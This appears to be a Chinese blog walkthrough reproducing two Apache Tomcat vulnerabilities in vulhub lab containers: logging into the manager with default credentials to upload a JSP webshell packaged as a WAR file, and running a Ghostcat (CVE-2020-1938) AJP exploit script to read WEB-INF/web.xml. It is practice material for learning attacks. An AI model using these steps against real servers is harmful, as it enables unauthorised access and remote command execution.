Apache Tomcat漏洞复现

文章目录

弱口令

启动环境

来到vulhub/tomcat/tomcat8/靶场

复制代码
cd vulhub/tomcat/tomcat8/

安装环境并启动:

复制代码
sudo docker-compose up -d && sudo docker-compose up -d

修改端口后启动:

复制代码
sudo docker-compose -f docker-compose.me.yml up -d

打开环境:

漏洞复现

点击Tomcat主页的manager APP登录,这里有弱口令漏洞,输入用户名Tomcat密码Tomcat即可登录成功:

登录后可以上传war文件,在这里上传打包成war文件的大马可以getshell:

到目录下

复制代码
cd /tools/webshell/jsp

使用命令

复制代码
cvf jshell.war jshell.jsp

将jshell.jsp文件打包成war文件,上传,上传后生成路径,表示上传成功:

访问大马文件:

点击系统命令,在这里执行命令,发现是root用户,相当于获取到了webshell:

本地文件包含

启动环境

来到vulhub/tomcat/CVE-2020-1938靶场

复制代码
cd vulhub/tomcat/CVE-2020-1938  

安装环境并启动:

复制代码
sudo docker-compose up -d && sudo docker-compose up -d

修改端口:

修改端口后启动:

复制代码
sudo docker-compose -f docker-compose.me.yml up -d

在浏览器输入10.9.75.45:8085,打开主页:

漏洞复现

这个主页有一个文件包含漏洞到/tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi目录下

复制代码
cd /tools/apache-tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi

从之前的配置文件看到8009端口开放,执行命令:

复制代码
python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.9.75.45 -p 8009 -f WEB-INF/web.xml

利用文件包含漏洞读取到该网站下的web.xml文件的内容:

相关推荐
Albert Edison22 分钟前
【最新版】IntelliJ IDEA 2025 创建 SpringBoot 项目
java·spring boot·intellij-idea
超级小忍1 小时前
JVM 中的垃圾回收算法及垃圾回收器详解
java·jvm
weixin_446122461 小时前
JAVA内存区域划分
java·开发语言·redis
勤奋的小王同学~1 小时前
(javaEE初阶)计算机是如何组成的:CPU基本工作流程 CPU介绍 CPU执行指令的流程 寄存器 程序 进程 进程控制块 线程 线程的执行
java·java-ee
TT哇1 小时前
JavaEE==网站开发
java·redis·java-ee
2401_826097621 小时前
JavaEE-Linux环境部署
java·linux·java-ee
安全系统学习2 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
缘来是庄2 小时前
设计模式之访问者模式
java·设计模式·访问者模式
Bug退退退1232 小时前
RabbitMQ 高级特性之死信队列
java·分布式·spring·rabbitmq
(:满天星:)3 小时前
第31篇:块设备与字符设备管理深度解析(基于OpenEuler 24.03)
linux·运维·服务器·网络·centos